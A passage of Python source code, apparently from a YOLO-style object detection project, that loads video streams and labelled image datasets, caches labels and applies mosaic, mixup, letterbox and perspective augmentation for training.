w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace(x.split('.')[-1], 'txt') for x in img_paths]
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = str(Path(self.label_files[0]).parent) + '.cache3' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Check labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache3'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
im = Image.open(img)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
#img, labels = load_mosaic9(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
#img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
class LoadImagesAndLabels9(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace(x.split('.')[-1], 'txt') for x in img_paths]
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = str(Path(self.label_files[0]).parent) + '.cache3' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Check labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache3'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
im = Image.open(img)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
#img, labels = load_mosaic(self, index)
img, labels = load_mosaic9(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
#img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padx
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + pady
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padx
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + pady
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, auto_size=32):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, auto_size), np.mod(dh, auto_size) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
